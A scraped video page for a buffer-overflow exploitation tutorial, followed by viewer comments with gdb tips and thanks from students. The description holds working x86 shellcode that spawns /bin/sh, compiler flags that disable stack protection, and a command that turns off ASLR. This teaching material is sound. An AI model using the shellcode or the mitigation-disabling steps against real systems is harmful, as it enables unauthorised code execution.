How to exploit a buffer overflow vulnerability - Practical

preview_player
Показать описание
This tutorial goes over the basic technique of how to exploit a buffer overflow vulnerability with an example.

This tutorial assumes that you already have: basic C knowledge, gdb, gcc and how programs represent memory.

The source code for the program can be downloaded at

The 46 byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

The compiling line is gcc -o example -fno-stack-protector -m32 -z execstack example.c
-fno-stack-protector === Removes the canary value at the end of the buffer
-m32 === Sets the program to compile into a 32 bit program
-z execstack === Makes the stack executable

NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished I strongly recommend you turn it back on with the command
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

* If your computer uses ARM then this won't work... if you don't know what this means then as of 2021 it should work if it's not a Raspberry Pi, phone, or an Apple computer released after 2020.
Рекомендации по теме
Комментарии
Автор

to anyone getting :
Cannot insert breakpoint 1.
Cannot access memory at address

the displayed memory addresses when you run disassemble main at first are not correct .
to get the correct ones run the commands as follow:

gdb ./example
run
disassemble main

now you get the correct ones copy it and quit gdb
gdb ./example
break *the address you copied

now running the command (run $(python will work.

Thanks for the video :)

AtlasMTBRider
Автор

TL;DR. Most of you will get something like "Cannot access memory at address 0x...."
That's because you have a 64 bit system installed.
To get this work, use the $rsp register instead of $esp.

Автор

I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!

RealKalleAnka
Автор

Thanks man, i got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.

yaseen
Автор

Great job at really explain buffer overflows and how to exploit it.

pberson
Автор

Dude! Thank you!!!
I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming.

Thanks lots mate!!!

Arkata
Автор

This tutorial is amazing. Thank you so much for the work you put into it

Henry_the_knight
Автор

thank you so much man. this video saved me on a homework assignment!

ayanoayumu
Автор

You should use GDB to inspect the code and have an idea about the possible attack but since it inserts extra variables for debugging purpose, you'll have to del with the offset introduced.

sorrefly
Автор

This really helped me understand the details of buffer overflows, thanks!

annablendermann
Автор

this might be the best tutorial ever, but I still couldn't understand my security homework

pennysmith
Автор

Thank you so much for this! Practical and easy to understand.

DS-mgzx
Автор

Great explanation. Thank you for the details!

Beulzabob
Автор

Love this would have loved a little more explanation on the shell code tho would have gladly watched for 30 mins

cursedfox
Автор

Great explanation, and concise example. Thanks.

srcmake
Автор

Ran the code with the flags you mentioned in description but still facing the same issue of cannot access memory at address. I am using Kali linux 32 bit version in VM Ware. Disabled ASLR. Any solution would be highly appreciated.

shubhamshah
Автор

Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!

pitkes
Автор

You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.

harbaapkabaap
Автор

Excellent explanation thank you. Can you advise on how you developed the machine code that you ran to get shell to start.

karimbarakat
Автор

impressive skills

thanks for the tutorial !!

Darieee
visit shbcf.ru